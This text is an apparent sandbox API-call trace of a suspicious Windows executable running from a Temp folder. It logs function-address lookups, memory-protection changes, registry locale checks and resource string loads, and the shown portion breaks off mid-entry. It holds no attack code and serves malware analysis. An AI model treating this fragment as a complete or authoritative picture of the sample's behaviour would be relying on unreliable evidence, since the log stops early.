[0115.483] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0115.487] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0115.488] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0115.490] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0115.490] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0115.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0115.490] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0115.490] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0115.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0115.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0115.491] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0115.492] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0115.492] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0115.492] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0115.492] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0115.493] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0115.493] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0115.493] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0115.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0115.493] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0115.493] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0115.493] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0115.493] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0115.494] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0115.494] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0115.494] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0115.494] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0115.494] SetThreadLocale (Locale=0x400) returned 1 [0115.495] GetVersion () returned 0x1db10106 [0115.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.495] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0115.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.495] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0115.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.495] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0115.495] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0115.496] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.496] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0115.496] GetACP () returned 0x4e4 [0115.496] GetCurrentThreadId () returned 0xdec [0115.496] GetVersion () returned 0x1db10106 [0115.496] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x6f1cb0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0115.496] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.496] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.496] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x13f0000 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0115.497] GetUserDefaultUILanguage () returned 0x409 [0115.498] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0115.498] GetThreadUILanguage () returned 0x120409 [0115.498] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0115.498] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x151a680, pcchLanguagesBuffer=0x12d768) returned 1 [0115.498] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] GetUserDefaultUILanguage () returned 0x409 [0115.499] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0115.499] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0115.499] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, 